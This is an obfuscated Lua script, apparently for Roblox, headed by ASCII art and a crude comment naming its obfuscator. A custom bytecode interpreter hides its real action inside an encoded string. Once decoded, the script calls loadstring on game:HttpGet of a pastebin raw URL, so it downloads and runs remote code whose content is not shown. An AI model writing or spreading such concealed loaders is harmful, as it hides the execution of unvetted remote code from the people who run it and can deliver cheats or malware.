--[[

░░░░░░░░░░░░░░░▄▄░░░░░░░░░░░   ░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄
░░░░░░░░░░░░░░█░░█░░░░░░░░░░   ░░░░█░░░░▒▒▒▒▒▒▒▒▒▒▒▒░░▀▀▄
░░░░░░░░░░░░░░█░░█░░░░░░░░░░   ░░░░█░░░░▒▒▒▒▒▒▒▒▒▒▒▒░░▀▀▄
░░░░░░░░░░░░░░█░░█░░░░░░░░░░   ░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░█
░░░░░░░░░░░░░░█░░█░░░░░░░░░░   ░▀▒▄▄▄▒░█▀▀▀▀▄▄█░░░██▄▄█░░░█
██████▄███▄████░░███▄░░░░░░░   █▒█▒▄░▀▄▄▄▀░░░░░░░░█░░░▒▒▒▒▒█
▓▓▓▓▓▓█░░░█░░░█░░█░░░███░░░░   █▒█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄▒█
▓▓▓▓▓▓█░░░█░░░█░░█░░░█░░█░░░   ░█▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
▓▓▓▓▓▓█░░░░░░░░░░░░░░█░░█░░░   ░░█░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
▓▓▓▓▓▓█░░░░░░░░░░░░░░░░█░░░░   ░░░█░░██░░▀█▄▄▄█▄▄█▄████░█
▓▓▓▓▓▓█░░░░░░░░░░░░░░██░░░░░   ░░░░█░░░▀▀▄░█░░░█░███████░█
▓▓▓▓▓▓█████░░░░░░░░░██░░░░░░   ░░░░░▀▄░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
                               ░░░░░░░▀▄▄░▒▒▒▒░░░░░░░░░░█
                               ░░░░░░░░░░▀▀▄▄░▒▒▒▒▒▒▒▒▒▒░█
                               ░░░░░░░░░░░░░░▀▄▄▄▄▄░░░░░█

-Nem tenta corno- Obfuscado BY Pokas (alpha 1.0) chupeminhachibata.com.br
]]--
local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v81=(v31/((5 -3)^(v32-1)))%((5 -(1 + 2))^(((v33-(1 -0)) -(v32-(2 -1))) + ((1497 -(282 + 595)) -(555 + 64)))) ;return v81-(v81%((2569 -(1523 + 114)) -(857 + 74))) ;else local v82=2^(v32-((512 + 57) -(367 + 201))) ;return (((v31%(v82 + v82))>=v82) and (928 -(214 + 713))) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 );v19=v19 + ((122 -(32 + 85)) -(1 + 0)) ;return (v37 * (16778281 -(68 + 997))) + (v36 * (66806 -(226 + 1044))) + (v35 * (1114 -858)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=357 -(47 + 310) ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (3~=v38) then else v45=nil;while true do local v89=0 + 0 ;local v90;while true do if (v89==(0 -0)) then v90=0;while true do if (v90==1) then if (v39==0) then v40={};v41={};v42={};v43={v40,v41,nil,v42};v39=291 -(60 + 230) ;end break;end if (v90==0) then local v100=0;while true do if (v100==(3 -2)) then v90=1;break;end if (v100==(0 + 0)) then if (v39==(2 -0)) then for v145=1457 -(282 + 1174) ,v24() do local v146=0 + 0 ;local v147;local v148;while true do if ((0 -0)~=v146) then else local v155=0 + 0 ;while true do if (v155==(1474 -(1329 + 145))) then v147=0;v148=nil;v155=972 -(140 + 831) ;end if (v155==(1851 -(1409 + 441))) then v146=719 -(15 + 703) ;break;end end end if (v146~=(1 + 0)) then else while true do if (v147~=0) then else v148=v22();if (v21(v148,439 -(262 + 176) ,1)==(1721 -(345 + 1376))) then local v162=1271 -(945 + 326) ;local v163;local v164;local v165;while true do if (v162==0) then local v166=688 -(198 + 490) ;local v167;while true do if (v166==0) then v167=0;while true do if (v167==(2 -1)) then v162=4 -3 ;break;end if (v167==(0 -0)) then local v183=1206 -(696 + 510) ;while true do if (v183~=(1 -0)) then else v167=1;break;end if (v183==(1262 -(1091 + 171))) then v163=v21(v148,1 + 1 ,1503 -(1408 + 92) );v164=v21(v148,4,1092 -(461 + 625) );v183=3 -2 ;end end end end break;end end end if (v162~=2) then else local v168=1288 -(993 + 295) ;while true do if ((1 + 0)~=v168) then else v162=9 -6 ;break;end if (v168==(374 -(123 + 251))) then if (v21(v164,1 + 0 ,1)~=(4 -3)) then else v165[2]=v45[v165[2]];end if (v21(v164,1 + 1 ,700 -(208 + 490) )==(1 + 0)) then v165[1 + 2 ]=v45[v165[2 + 1 ]];end v168=1;end end end if (v162~=1) then else local v169=836 -(660 + 176) ;while true do if (v169==(1 + 0)) then v162=204 -(14 + 188) ;break;end if (v169~=(1322 -(1249 + 73))) then else v165={v23(),v23(),nil,nil};if (v163==(0 + 0)) then local v180=1145 -(466 + 679) ;local v181;local v182;while true do if (v180==(1 + 0)) then while true do if ((0 -0)==v181) then v182=0 -0 ;while true do if (v182==(0 -0)) then v165[2 + 1 ]=v23();v165[3 + 1 ]=v23();break;end end break;end end break;end if ((396 -(115 + 281))==v180) then v181=0 + 0 ;v182=nil;v180=2 -1 ;end end elseif (v163==(1 + 0)) then v165[7 -4 ]=v24();elseif (v163==(5 -3)) then v165[10 -7 ]=v24() -((869 -(550 + 317))^(22 -6)) ;elseif (v163~=3) then else local v187=0 -0 ;local v188;while true do if (v187~=0) then else v188=0 -0 ;while true do if (v188==(285 -(134 + 151))) then v165[1668 -(970 + 695) ]=v24() -(2^(46 -30)) ;v165[4]=v23();break;end end break;end end end v169=167 -(122 + 44) ;end end end if (v162~=3) then else if (v21(v164,5 -2 ,3)==(1991 -(582 + 1408))) then v165[4]=v45[v165[13 -9 ]];end v40[v145]=v165;break;end end end break;end end break;end end end for v149=3 -2 ,v24() do v41[v149-(1 -0) ]=v29();end return v43;end if (v39~=1) then else local v144=0 + 0 ;while true do if (v144==(7 -5)) then v39=1826 -(1195 + 629) ;break;end if (v144==(0 -0)) then local v153=65 -(30 + 35) ;while true do if (v153==(241 -(187 + 54))) then v44=v24();v45={};v153=1;end if (v153==(781 -(162 + 618))) then v144=1 + 0 ;break;end end end if (v144==(1 + 0)) then for v156=1,v44 do local v157=1257 -(1043 + 214) ;local v158;local v159;local v160;local v161;while true do if (v157~=(1 -0)) then else v160=nil;v161=nil;v157=2 -0 ;end if (v157==0) then v158=0;v159=nil;v157=1;end if (v157~=2) then else while true do if ((1212 -(323 + 889))~=v158) then else v159=0 -0 ;v160=nil;v158=581 -(361 + 219) ;end if ((321 -(53 + 267))~=v158) then else v161=nil;while true do if (v159==(1 + 0)) then if (v160==(1637 -(1373 + 263))) then v161=v22()~=(1000 -(451 + 549)) ;elseif (v160==(1 + 1)) then v161=v25();elseif (v160==(4 -1)) then v161=v26();end v45[v156]=v161;break;end if (v159~=(0 -0)) then else local v172=0;local v173;while true do if (v172==(982 -(18 + 964))) then v173=0;while true do if (v173~=(0 -0)) then else local v185=0 + 0 ;while true do if (v185==(1385 -(746 + 638))) then v173=1;break;end if (v185==(0 + 0)) then v160=v22();v161=nil;v185=851 -(20 + 830) ;end end end if (v173~=1) then else v159=1 + 0 ;break;end end break;end end end end break;end end break;end end end v43[4 -1 ]=v22();v144=343 -(218 + 123) ;end end end v100=1582 -(1535 + 46) ;end end end end break;end end end break;end if (v38==(1 + 0)) then v41=nil;v42=nil;v38=1 + 1 ;end if (v38==2) then local v87=0 -0 ;while true do if (v87==(0 + 0)) then v43=nil;v44=nil;v87=561 -(306 + 254) ;end if (v87~=1) then else v38=3;break;end end end if (v38==(0 + 0)) then local v88=0 + 0 ;while true do if (v88==1) then v38=1 -0 ;break;end if (v88==(0 -0)) then v39=1467 -(899 + 568) ;v40=nil;v88=406 -(118 + 287) ;end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=v24();local v47=v24();local v48=3 -2 ;local v49=(v21(v47,1122 -(118 + 1003) ,58 -(32 + 6) ) * ((1 + 1)^(409 -(61 + 81 + 235)))) + v46 ;local v50=v21(v47,95 -74 ,7 + 24 );local v51=((v21(v47,1009 -((2057 -(363 + 1141)) + (2004 -(1183 + 397))) )==(2 -1)) and  -1) or ((2 -1) -0) ;if (v50==(0 + 0)) then if (v49==(0 + 0)) then return v51 * (0 + 0) ;else v50=1 + 0 + 0 ;v48=0 + 0 ;end elseif (v50==(4437 -2390)) then return ((v49==(0 -0)) and (v51 * ((2 -1)/(0 -(0 + 0))))) or (v51 * NaN) ;end return v8(v51,v50-(1359 -(144 + 192)) ) * (v48 + (v49/((218 -(42 + 174))^(40 + 12)))) ;end v26=nil;function v26(v52)local v53=0 -0 ;local v54;local v55;while true do if (v53==(1976 -(1913 + (366 -(244 + 60))))) then v54=v3(v16,v19,(v19 + v52) -(1 + 0) );v19=v19 + v52 ;v53=5 -3 ;end if (v53==(1936 -(565 + 1368))) then return v6(v55);end if ((0 -0)==v53) then v54=nil;if  not v52 then v52=v24();if (v52==(1661 -(1477 + 184))) then return "";end end v53=1 -0 ;end if (v53==(2 + 0 + 0)) then v55={};for v91=857 -(564 + 292) , #v54 do v55[v91]=v2(v1(v3(v54,v91,v91)));end v53=4 -1 ;end end end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=476 -(41 + 435) ;local v58;local v59;while true do if (v57==0) then v58,v59=v1(v16,v19,v19 + 2 );v19=v19 + (1003 -(938 + (1676 -(1565 + 48)))) ;v57=1 + 0 + 0 ;end if (v57==(1126 -(936 + 189))) then return (v59 * (85 + 171)) + v58 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v83=v2(v0(v60,16));if v20 then local v93=v5(v83,v20);v20=nil;return v93;else return v83;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v28;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v84=0,v75 do if (v84>=v69) then v73[v84-v69 ]=v74[v84 + 1 ];else v77[v84]=v74[v84 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=6) then if (v80<=2) then if (v80<=0) then if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end elseif (v80==1) then v77[v79[2]]();else v77[v79[2]]();end elseif (v80<=4) then if (v80==3) then if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end else local v104=v79[2];local v105=v77[v79[3]];v77[v104 + 1 ]=v105;v77[v104]=v105[v79[4]];end elseif (v80==5) then local v109=v79[2];v77[v109]=v77[v109](v13(v77,v109 + 1 ,v72));else do return;end end elseif (v80<=9) then if (v80<=7) then local v98=0;local v99;while true do if (v98==0) then v99=v79[2];v77[v99]=v77[v99](v13(v77,v99 + 1 ,v72));break;end end elseif (v80==8) then v77[v79[2]]=v79[3];else local v113=0;local v114;local v115;while true do if (v113==0) then v114=v79[2];v115=v77[v79[3]];v113=1;end if (1==v113) then v77[v114 + 1 ]=v115;v77[v114]=v115[v79[4]];break;end end end elseif (v80<=11) then if (v80>10) then local v116=v79[2];local v117,v118=v70(v77[v116](v13(v77,v116 + 1 ,v79[3])));v72=(v118 + v116) -1 ;local v119=0;for v129=v116,v72 do local v130=0;while true do if (v130==0) then v119=v119 + 1 ;v77[v129]=v117[v119];break;end end end else local v120=0;local v121;local v122;local v123;local v124;while true do if (v120==0) then v121=v79[2];v122,v123=v70(v77[v121](v13(v77,v121 + 1 ,v79[3])));v120=1;end if (v120==1) then v72=(v123 + v121) -1 ;v124=0;v120=2;end if (v120==2) then for v142=v121,v72 do local v143=0;while true do if (v143==0) then v124=v124 + 1 ;v77[v142]=v122[v124];break;end end end break;end end end elseif (v80>12) then do return;end else v77[v79[2]]=v79[3];end v71=v71 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F54467A72656B426800083O0012033O00013O001203000100023O002004000100010003001208000300044O000A000100034O00055O00022O00013O000100012O00063O00017O00",v9(),...);
